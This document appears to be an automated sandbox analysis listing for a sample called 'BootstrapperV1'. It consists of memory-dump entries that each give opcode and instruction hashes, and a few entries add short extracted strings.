• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3fbfe54386938087983e3927b367992185f6d0fc7b569af977fb1a76f719f987
• Instruction ID: 1283f094d033dfa96b5886f2a1fe7a6b30a28e959e6b97099ba0f8f58613f84c
• Opcode Fuzzy Hash: 3fbfe54386938087983e3927b367992185f6d0fc7b569af977fb1a76f719f987
• Instruction Fuzzy Hash: A2F0273170C80B1EE768B52DD609F7166D5EF993B2F25007AE54EC33E2DC99AC538280
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 59d1a9fe5c4d33bce526ad8a89c0a677b302b7f5bf686403cd6641f749900ce5
• Instruction ID: f7e15252928e7e0db535283dfe6861396c9663ebef09fd1ef6df5806d5cf9b54
• Opcode Fuzzy Hash: 59d1a9fe5c4d33bce526ad8a89c0a677b302b7f5bf686403cd6641f749900ce5
• Instruction Fuzzy Hash: 9E01817180E7894FE7569BB488256E57FE1EF46310F0946EBD049CB2E3DA2818098B52
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 501b3c8a9fccc2c431006636e77c225cd9f1fa58137c4746b1f2ac49a636cd88
• Instruction ID: 3fda3589da2d02740546ece3e4f569824b98148783f1cebb0e4302fc3e27a433
• Opcode Fuzzy Hash: 501b3c8a9fccc2c431006636e77c225cd9f1fa58137c4746b1f2ac49a636cd88
• Instruction Fuzzy Hash: 7401F96090D14A5FDB55EF34C0956BD7FF1DF01281F2444BEC04AC76A3D9245442CB00
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 199a41338bcc3484f1b31a5b44f6ae1375bbf9624e652ea2d9faf1ee9b08ef58
• Instruction ID: 3bd2ce654789de2a4f3c823c5e088438da20b87d40dbc00518a319010db2f20a
• Opcode Fuzzy Hash: 199a41338bcc3484f1b31a5b44f6ae1375bbf9624e652ea2d9faf1ee9b08ef58
• Instruction Fuzzy Hash: EBF0FE71A2CB489B9F04AE0CBC434AD77D0FB98B21F10116FFA4943211D621F9528AC7
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d6bc23df946ec4985ea9a19002510c09bdbfe8188d8ed238130de20d12e1894
• Instruction ID: 5515934b1caf728776510d598679418582bffc4855e3501a33b034a283b2f49b
• Opcode Fuzzy Hash: 2d6bc23df946ec4985ea9a19002510c09bdbfe8188d8ed238130de20d12e1894
• Instruction Fuzzy Hash: AC012D2040D6C61FD317AB3CC9955A47BE0EF45341B0941FAD5C8CF3A7D91CA8858751
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0e56415f821996b0627671c4dafa2f81fb6d6f4cad0ec83d61c142344e4709d
• Instruction ID: 9bb18089a1f1010b339dfcc690d94db1e187d9da7da356f63289ee80f8a9deed
• Opcode Fuzzy Hash: b0e56415f821996b0627671c4dafa2f81fb6d6f4cad0ec83d61c142344e4709d
• Instruction Fuzzy Hash: 5801ADB081CBCD4FDB42EF7888681A9BFB0FF16200B0408EBD858D72A3DA799914C711
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de52578382d4ccc7d34fbcaeedf1c5328341decf62b6ba6810272c956909e3e9
• Instruction ID: 40b0fb19149faf0a14860a7e86a2b290ec7ec924032ec49c8bad96aaefd664a4
• Opcode Fuzzy Hash: de52578382d4ccc7d34fbcaeedf1c5328341decf62b6ba6810272c956909e3e9
• Instruction Fuzzy Hash: A3F0A7F271CA1D4FA248BE2C69031BD73C2DBCA561710807FC58EC3262DD55680707C5
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b1634d640fab113754b8e872173ca9822eeab8a942c27ddb31c0bc2f8d23cc3
• Instruction ID: 7a53edf090897e9845008e1925ba45f815dd07c49048c5a98843d2ac2f8020b6
• Opcode Fuzzy Hash: 5b1634d640fab113754b8e872173ca9822eeab8a942c27ddb31c0bc2f8d23cc3
• Instruction Fuzzy Hash: F8F0E992B0EE8B0BE799A53CE8405BDF380EF9525170445BEC009CA29ADD19594A4301
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6c557113f7e781f9f568d28cf46b8ea25cae536bada64299e3d40a5e60336a5
• Instruction ID: 9d924a2309490a4e5b143d39dfef2bc485d22e71b6f46879d3c82dcc8b27172b
• Opcode Fuzzy Hash: b6c557113f7e781f9f568d28cf46b8ea25cae536bada64299e3d40a5e60336a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E01D6D0E1E1861EF716BBB4C5623B87B91AF42300F0044BED54D876E3DD1C28418315
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cb35915dd89c578b2672987c9bee8bf21d17dd992436d31a41e3a88004d0b13f
                                                                                                                                                                                                                                              • Instruction ID: 3242929b95512ed1ed379f2ae2e7208d9ec20eb1cf7fae1fbced8010ff871bea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb35915dd89c578b2672987c9bee8bf21d17dd992436d31a41e3a88004d0b13f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F09E9190C5250BEB22FE7CE2869FD77D0AF54311B0540F3E15DC72F2D904A8818395
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aba6597b980edb28d3a5b73d163e1c861c53b25ee63d1a0c9f82739786db0e36
                                                                                                                                                                                                                                              • Instruction ID: 6aa85f9e580b188a3a6a5b27d9fdbe2119607eecd8f3f1403299c5520063da86
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aba6597b980edb28d3a5b73d163e1c861c53b25ee63d1a0c9f82739786db0e36
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF02071A1CE0D2AD6A9FB3894447BA72D2EB85311F40417AE40EC23A5DE2868828380
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7f823444f92919883d2b5f517d2167fb4985d1e81024961be442f1dbcf2fa103
                                                                                                                                                                                                                                              • Instruction ID: ba0b98c80417e610dfbbabc2aab380cfac1a43f08a1ac277598216d8bfd1e292
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f823444f92919883d2b5f517d2167fb4985d1e81024961be442f1dbcf2fa103
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BE0D861B0C8294FDBF8FE6CA445AAC37D0EF4C38170140E6E84DC72B5D9409C8843C0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3cbd97c03a6beb67969f9494da8dcfcb18b80962bbe74eb6574879dd8aa8d549
                                                                                                                                                                                                                                              • Instruction ID: 20d2be077420e1e0dae37e6ca1714ab7add011295cd0badccb2438ac74903aca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cbd97c03a6beb67969f9494da8dcfcb18b80962bbe74eb6574879dd8aa8d549
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DE02241B0D42906EA29727CB4903F937508F0622AF0840F6D88CC11D7DC891C4A02D9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0f9b7a755a48b0ef78c6d69fdcb5dfd4bc5f38e77dad859ea9dc6731bcfb7412
                                                                                                                                                                                                                                              • Instruction ID: f54ce112231bb26e36a32cba283ae3e698fa57c044c9c78ab5a8e586920d4ac5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9b7a755a48b0ef78c6d69fdcb5dfd4bc5f38e77dad859ea9dc6731bcfb7412
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE0D83170C4054FE718FE2CD590AFC3352DB90322F14C23AC916C63E4DD98E4418780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 01e4f1920a3b16967daf8ac63556c487f1e630d4091e5534ee4ccabd137948b6
                                                                                                                                                                                                                                              • Instruction ID: 5079e8c76fdf6ff7ff350bf0f396c10b14f5b66f58e5f686aa8793b2ce9a213d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01e4f1920a3b16967daf8ac63556c487f1e630d4091e5534ee4ccabd137948b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CE0CD51E1D42501FA69757CF4917F937918F0A325F0840F6E89DD11CBDC8D2C8E02D9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 27ca26091a51440a0afdbac1fdccd1c055c86d10edac9cc1250b6ac60396edf7
                                                                                                                                                                                                                                              • Instruction ID: bd3347415e2b9b858217742aaf53e539b936588edac59c232347349d5c6b4974
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27ca26091a51440a0afdbac1fdccd1c055c86d10edac9cc1250b6ac60396edf7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9E0DFA2D08E4DABD748EBB8C4865ECBBE2FF58220F0413F8C049B3281DC282402C740
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f466597237a1fae831711827ca9a72f05df91a6688bdb2f981fc4e129704ecf8
                                                                                                                                                                                                                                              • Instruction ID: 77dd86e3648ad1af051343aff82386c32a1b9fd52dd6fa3612a2976aaec7d657
• Opcode Fuzzy Hash: f466597237a1fae831711827ca9a72f05df91a6688bdb2f981fc4e129704ecf8
• Instruction Fuzzy Hash: 78E0D852E0E7D40FE7AB623859662A53FA09F46210F0900EFC588C76E3D88D9C4D4386

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2a1a401075dc92ccb22e0cde4212507af31ca28d6d8307d9375fcfecc910b10
• Instruction ID: 0930df2421a8b6f422474577f5b0617ffe4b0113e84f5e12acd66f2419995ff3
• Opcode Fuzzy Hash: b2a1a401075dc92ccb22e0cde4212507af31ca28d6d8307d9375fcfecc910b10
• Instruction Fuzzy Hash: EBD05E62F1EC6E3691B9B63D79557BD0485DBCC622B8942B2E90DC3399DC08EC8102C4

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c78ecc4f7f718d7e2c8da25ef10b900991956dd181bf7d8a11c1845477738cc3
• Instruction ID: a5dd1676f607fc4232d767140e43e34a8a80bef4cf0a9b995e1f72327ebb979d
• Opcode Fuzzy Hash: c78ecc4f7f718d7e2c8da25ef10b900991956dd181bf7d8a11c1845477738cc3
• Instruction Fuzzy Hash: D8E0C225E0DD4A06EE8CA9398C920603691EFA8208BD44099C509C2391F81ADA82C342

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
• Instruction ID: f50fe2d701b2e86d2fcfcdaa2670837e3d4b7efaf0be581c9967d561443efc53
• Opcode Fuzzy Hash: 9fd3513acbb94f14bb395ae456e300db7c38f81f5a8ebc6029c21a9497038c47
• Instruction Fuzzy Hash: 9CE0C260C1CB460BE704FE328D4507A71D1BB98202FC88A36D98CD0260EE3CD7D88242

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 691a2f3a06536ee3440fbcbf9ecb7c0123ed8711d37f8a065ab607ce4027d070
• Instruction ID: 57052125ade3123827d56b03cff2564d4336355e73d3edc8e1a9f92c70dd8bdf
• Opcode Fuzzy Hash: 691a2f3a06536ee3440fbcbf9ecb7c0123ed8711d37f8a065ab607ce4027d070
• Instruction Fuzzy Hash: C9D02B7081C91515EBA0BA38A1046F563C0CB94312F0405B7FD0DD23B0DC495A8142C5

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41de1f144ea261981d5b47be965c53e4f68bc96f57bda39cb78378e80b487e37
• Instruction ID: f7d00cf2f4fbc351e7503c2b90b9fa09dfa5cf79570f09bf70b4c4104b0f2337
• Opcode Fuzzy Hash: 41de1f144ea261981d5b47be965c53e4f68bc96f57bda39cb78378e80b487e37
• Instruction Fuzzy Hash: F5E08691C0D3C10BE755B6358D561A97FC0AF55251F4886FEC6888A1A6D93CA1848642

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdbbb4cc451a1bc38ec49a8e998f788c13b17b89c3d4d0ca903f4b9ed766e6be
• Instruction ID: 3772011241c6a03ae0a5475b07a6197bde32287ebe95ddbc0b6f0e4529656892
• Opcode Fuzzy Hash: cdbbb4cc451a1bc38ec49a8e998f788c13b17b89c3d4d0ca903f4b9ed766e6be
• Instruction Fuzzy Hash: 79D0A760F1D82905FA6D317C65013F81181CF48310F0444FAE91DD26C6DCCD5C8D02C5

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a83d3d35c1a37e25b2de17fbb6ded89f88cf26ad7823b6822420882a32996be
• Instruction ID: 357b349524716e57f52f494bab512cb32993ef64ced095763cc098eee5dcf06d
• Opcode Fuzzy Hash: 1a83d3d35c1a37e25b2de17fbb6ded89f88cf26ad7823b6822420882a32996be
• Instruction Fuzzy Hash: 50E0EC8190F6C92FDE42FB7C856A1997FA09E4B280B1888E9D0888F1A3F008140E8302

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53f4c3e0937114a6dd07d5acbce3b32d082a81422b88ea905082a50662f27d5a
• Instruction ID: 19b0a5820474929cc748cfa78fd9397bf71cd51c5f8eaef9706b9d09d844bf11
• Opcode Fuzzy Hash: 53f4c3e0937114a6dd07d5acbce3b32d082a81422b88ea905082a50662f27d5a
• Instruction Fuzzy Hash: 71D0A79090D9DD5FFA51BFF804166ADAFD18F49280B5401E5C88DD7253D91808438380

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 96d115bdd688fb309cad2923506d8af420a36d87e70b5814269759b240645adf
• Instruction ID: 810a4cd5cc01613bc92af1b88be1742a8651206a943cd7d5b2ee1b2976592032
• Opcode Fuzzy Hash: 96d115bdd688fb309cad2923506d8af420a36d87e70b5814269759b240645adf
• Instruction Fuzzy Hash: 20D05B7190894E9FDF84FE68C5426AD7BB1EB99301F544065D14DD3653C53458418740

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f44e0848ddec73a830f6baf9b09e8a398a95201adf8ef336560d7ef33dc4910
• Instruction ID: 55d7dada68ded64f3a8d6d4e28053c4fc534b83810e84c88d17a461d07524f50
• Opcode Fuzzy Hash: 3f44e0848ddec73a830f6baf9b09e8a398a95201adf8ef336560d7ef33dc4910
• Instruction Fuzzy Hash: 95C08012B1DE090A91917A78F4810F6F251EB841207505976D41FC114EDD1D98874340

Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ecc07a1cc7674d2c0c2618bd9158f5902e4f7e305b420c0fcb13c16ba229561d
                                                                                                                                                                                                                                              • Instruction ID: 7477e0b91e086a9496a1d246ab684fcd686ba9a605eef975c173008cdc407917
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecc07a1cc7674d2c0c2618bd9158f5902e4f7e305b420c0fcb13c16ba229561d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3D05B9060D1821FF347677481553B57B924F43394F4404FDC549471E7DD1964894319
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                                                              • Instruction ID: f597784e1c0195ef801e971a820a2905f94c5cf9c95bd4e4737730957c53aee3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7C08C72F0480C9E8F80FBDCE0016ECBBB0EB8C222F041033D20CF3200CA2014504790
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Pd K$`d K$hd K$pd K$xd K
                                                                                                                                                                                                                                              • API String ID: 0-558404148
                                                                                                                                                                                                                                              • Opcode ID: 2fdff3d6294ab6211186beb813b811ab1a267c3fdfe945654b4a90637149e0e4
                                                                                                                                                                                                                                              • Instruction ID: 0391b93be23d43da4f7afe0df673ec921e38acc7df888e5cc12e324381abd8da
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fdff3d6294ab6211186beb813b811ab1a267c3fdfe945654b4a90637149e0e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 733127A3A0E7C24BE3139B789DE6499BFB0EF0225870C81F6D1C44B197EE19550A8392
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                                              • API String ID: 0-2396788759
                                                                                                                                                                                                                                              • Opcode ID: bbb93cba44145987be5c536ff951cb8193cfff5e366c6eee88ca36002defd236
                                                                                                                                                                                                                                              • Instruction ID: 67ef20ace988ab08d72295435224ad04edda20041a53e6200317a3276d2d8577
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbb93cba44145987be5c536ff951cb8193cfff5e366c6eee88ca36002defd236
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C31AFB3D0DB869FE7165E29CC9A094BBE0EF1121534E42F6C554CF293FE192806C623
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0G K$@G K$PG K$`G K
                                                                                                                                                                                                                                              • API String ID: 0-862706759
                                                                                                                                                                                                                                              • Opcode ID: 7d8a96f33c54068a4f37b8b335d42e0f0e297600a68fdf78a6d837651be6d351
                                                                                                                                                                                                                                              • Instruction ID: 5e2be0c296c31f4458572c76da27abf20a2d532630dccbdaa453a0af2c57cb80
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d8a96f33c54068a4f37b8b335d42e0f0e297600a68fdf78a6d837651be6d351
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 555130D3E0D6D50BE352AB7CE9994E97FA0EF532A970880F7C2C84B1A7DC4955098392
                                                                                                                                                                                                                                              Strings
